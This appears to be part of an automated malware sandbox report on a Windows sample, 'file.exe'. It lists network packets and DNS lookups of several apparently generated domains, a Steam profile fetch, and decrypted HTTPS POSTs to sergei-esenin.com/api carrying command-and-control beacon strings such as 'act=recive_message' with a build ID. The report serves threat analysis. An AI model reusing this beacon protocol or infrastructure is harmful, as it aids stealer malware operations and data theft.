                                                          Oct 14, 2024 06:52:06.634362936 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.634418011 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.635205984 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.935009956 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.935025930 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.935091972 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.935105085 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.935146093 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.935173988 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.935204029 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.935216904 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.935256004 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.935259104 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.935302973 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.938160896 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.938177109 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.938190937 CEST49730443192.168.2.4104.102.49.254
                                                          Oct 14, 2024 06:52:06.938198090 CEST44349730104.102.49.254192.168.2.4
                                                          Oct 14, 2024 06:52:06.961575031 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:06.961622953 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:06.961685896 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:06.961999893 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:06.962013960 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.447230101 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.447329998 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.449961901 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.449971914 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.450294971 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.451558113 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.451590061 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.451689005 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.578798056 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.578916073 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579008102 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579094887 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579098940 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579133987 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579155922 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579277039 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579339027 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579396963 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579415083 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.579427004 CEST49731443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.579437017 CEST44349731104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.643392086 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.643429995 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:07.643507004 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.643781900 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:07.643799067 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.131323099 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.131640911 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.133153915 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.133166075 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.133701086 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.134907961 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.134941101 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.135116100 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.724137068 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.724314928 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.724365950 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.724984884 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.725009918 CEST44349732104.21.53.8192.168.2.4
                                                          Oct 14, 2024 06:52:08.725024939 CEST49732443192.168.2.4104.21.53.8
                                                          Oct 14, 2024 06:52:08.725033045 CEST44349732104.21.53.8192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 14, 2024 06:52:05.178119898 CEST6155453192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.187215090 CEST53615541.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:05.189241886 CEST5376653192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.198281050 CEST53537661.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:05.200339079 CEST6316953192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.209512949 CEST53631691.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:05.211009979 CEST5320953192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.219938040 CEST53532091.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:05.221678972 CEST5862853192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.232213020 CEST53586281.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:05.233741045 CEST5855453192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.249588966 CEST53585541.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:05.250602961 CEST5054753192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.266468048 CEST53505471.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:05.267740965 CEST5115353192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.282567024 CEST53511531.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:05.284353018 CEST6198253192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:05.291683912 CEST53619821.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:06.949424982 CEST5059953192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:06.960937023 CEST53505991.1.1.1192.168.2.4
                                                          Oct 14, 2024 06:52:35.624850988 CEST5357713162.159.36.2192.168.2.4
                                                          Oct 14, 2024 06:52:36.120326996 CEST5732153192.168.2.41.1.1.1
                                                          Oct 14, 2024 06:52:36.127024889 CEST53573211.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 14, 2024 06:52:05.178119898 CEST192.168.2.41.1.1.10xf0e5Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.189241886 CEST192.168.2.41.1.1.10xe7bbStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.200339079 CEST192.168.2.41.1.1.10xa27cStandard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.211009979 CEST192.168.2.41.1.1.10x417dStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.221678972 CEST192.168.2.41.1.1.10xd62eStandard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.233741045 CEST192.168.2.41.1.1.10x4e38Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.250602961 CEST192.168.2.41.1.1.10xaa46Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.267740965 CEST192.168.2.41.1.1.10xc1d6Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.284353018 CEST192.168.2.41.1.1.10x5f68Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:06.949424982 CEST192.168.2.41.1.1.10x9a5dStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:36.120326996 CEST192.168.2.41.1.1.10x6236Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 14, 2024 06:52:05.187215090 CEST1.1.1.1192.168.2.40xf0e5Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.198281050 CEST1.1.1.1192.168.2.40xe7bbName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.209512949 CEST1.1.1.1192.168.2.40xa27cName error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.219938040 CEST1.1.1.1192.168.2.40x417dName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.232213020 CEST1.1.1.1192.168.2.40xd62eName error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.249588966 CEST1.1.1.1192.168.2.40x4e38Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.266468048 CEST1.1.1.1192.168.2.40xaa46Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.282567024 CEST1.1.1.1192.168.2.40xc1d6Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:05.291683912 CEST1.1.1.1192.168.2.40x5f68No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:06.960937023 CEST1.1.1.1192.168.2.40x9a5dNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:06.960937023 CEST1.1.1.1192.168.2.40x9a5dNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                          Oct 14, 2024 06:52:36.127024889 CEST1.1.1.1192.168.2.40x6236Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • steamcommunity.com
                                                          • sergei-esenin.com

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449730104.102.49.2544436988C:\Users\user\Desktop\file.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-14 04:52:06 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Host: steamcommunity.com
                                                          2024-10-14 04:52:06 UTC1870INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                          Cache-Control: no-cache
                                                          Date: Mon, 14 Oct 2024 04:52:06 GMT
                                                          Content-Length: 34837
                                                          Connection: close
                                                          Set-Cookie: sessionid=7f29bf101b41067af1b6c20b; Path=/; Secure; SameSite=None
                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                          2024-10-14 04:52:06 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                          2024-10-14 04:52:06 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                          Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                          2024-10-14 04:52:06 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                          Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                          2024-10-14 04:52:06 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449731104.21.53.84436988C:\Users\user\Desktop\file.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-14 04:52:07 UTC264OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: sergei-esenin.com
                                                          2024-10-14 04:52:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-10-14 04:52:07 UTC553INHTTP/1.1 200 OK
                                                          Date: Mon, 14 Oct 2024 04:52:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Frame-Options: SAMEORIGIN
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z5oOjXMjkFaP6CRvGVpeEJ%2BHOqhZMfjk%2FOXIR9FHnyNMZNHVyZUUNndxEmMZbmm6ClCakFfH9Be5tfJvz2oa9N%2FqaJEuZI0Srw9YlQ3cJMrBLPdltEcGQy4TMe90mqyMWWw5lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d24f54b0c804398-EWR
                                                          2024-10-14 04:52:07 UTC816INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                          Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                          2024-10-14 04:52:07 UTC1369INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
                                                          Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
                                                          2024-10-14 04:52:07 UTC1369INData Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
                                                          Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
                                                          2024-10-14 04:52:07 UTC887INData Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
                                                          Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
                                                          2024-10-14 04:52:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449732104.21.53.84436988C:\Users\user\Desktop\file.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-14 04:52:08 UTC354OUTPOST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cookie: __cf_mw_byp=eY.z8bZweqIPgKfpYDlsN4_L2R0LQF9aLZkPSL_aagI-1728881527-0.0.1.1-/api
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 52
                                                          Host: sergei-esenin.com
                                                          2024-10-14 04:52:08 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                          Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                          2024-10-14 04:52:08 UTC825INHTTP/1.1 200 OK
                                                          Date: Mon, 14 Oct 2024 04:52:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=plrk69d56u5nvg2otbvphu8gh1; expires=Thu, 06 Feb 2025 22:38:47 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwZIaEjHKPlFec4l4BcqFCQcjajuLjZTlXpUBF27Ujq%2Fi9Nh59T1BEwWj1YbgrMjksBi4EiZi5sBNdfUZl3DW58mVTM8GCp9FMtyIiYj%2Ft9j0uYzJKExrbIlTNfMuhXxo0o7Lw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d24f54f39f342e2-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-10-14 04:52:08 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                          Data Ascii: aerror #D12
                                                          2024-10-14 04:52:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:00:52:02
                                                          Start date:14/10/2024
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
